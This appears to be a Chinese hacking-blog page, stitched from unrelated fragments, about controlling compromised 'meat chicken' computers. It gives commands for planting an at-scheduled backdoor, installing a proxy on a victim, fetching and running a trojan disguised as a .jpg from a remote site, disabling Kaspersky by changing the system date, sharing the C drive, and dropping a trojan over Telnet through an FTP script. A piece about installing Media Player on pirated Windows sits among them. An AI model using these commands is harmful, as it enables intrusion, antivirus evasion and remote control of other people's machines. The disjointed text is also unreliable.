技术人生

　　各位是否记得IPC$漏洞时用到的一个命令？ 没错，它就是at命令，其功能是在定时的时间内完成指定操作，而今天我们可以用它来做个一个隐蔽的后门程序。后门的功能就是在指定的时间创建一个系统用户。

at命令事实上对应了一个服务，名叫schedule服务，在services中我们可以找到一个task scheduler的服务名称，这就是它所对应的服务了，但是在普遍情况下此服务时禁用的，我们要做的第一个操作就是开启这项服务。

我在肉鸡CMD下安装一个后门代理跳板。执行：
E:\>SkSockServer -install
显示“拒绝访问”。
原因是被肉鸡上的杀毒软件拦截了。

　　我的操作系统是Windows Server 2003，而Windows Media Player版本是10，想换成新的11，可是下载了Windows Media Player 11的安装包，双击安装发现它不支持本系统。这个好解决，右键属性里面设置兼容Windows XP即可！可是接下来居然还要进行系统的正版验证，结果我的系统验证失败（当然失败了，我的系统本来就是盗版的嘿嘿~~）

1.肉鸡：所谓“肉鸡”是一种很形象的比喻，比喻那些可以随意被我们控制的电脑，对方可以是WINDOWS系统，也可以是UNIX/LINUX系统，可以是普通的个人电脑，也可以是大型的服务器，我们可以象自己的电脑那样来它们，而不被对方所发觉。

2.木马：就是那些表面上伪装成了正常的程序，但是当这些被程序运行时，就会获取系统的整个控制权限。有很多红客就是热衷于使用木马程序来控制别人的电脑，比如灰鸽子，黑洞，PcShare等等。

用SQLTOOLS连接上去后执行DOS命令时出现错误提示：

SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问，因为此组件已作为此服务器安全配置的一部分而被关闭……

　　Webshell是以asp、aspx、php、jsp、cgi等网页文件形式存在的一种命令执行环境，也可以将其称作是一种网页后门。黑客在入侵了一个网站后，通常会将这些asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起，然后就可以使用浏览器来访问这些asp或php后门，得到一个命令执行环境，以达到控制网络服务器的目的。

一、首先我们把要上传的文件或木马的exe后缀名改成jpg或gif等可以上传到网站空间上的文件类型，然后上传至网站空间。

二、打个比方上传后的地址为：http://www.hack0573.com/hqw.jpg。我们就在CMD Shell下输入：
start its:http://www.hack0573.com/hqw.jpg。

其实说白了就是更改系统的时间让卡巴斯基失效，批处理如下：
@echo off
set date=%date%
date 1987-02-06

net share 查看共享
net share c$=c:\ 将C盘设成共享
net user 显示所有用户

开了肉鸡的Telnet后，登陆上去，给他种一个木马上去。以下是我在CMD Shell中实际操作的：
*===============================================================
欢迎使用 Microsoft Telnet 服务器。
*===============================================================
C:\>echo open 192.168.0.147 > ftp.txt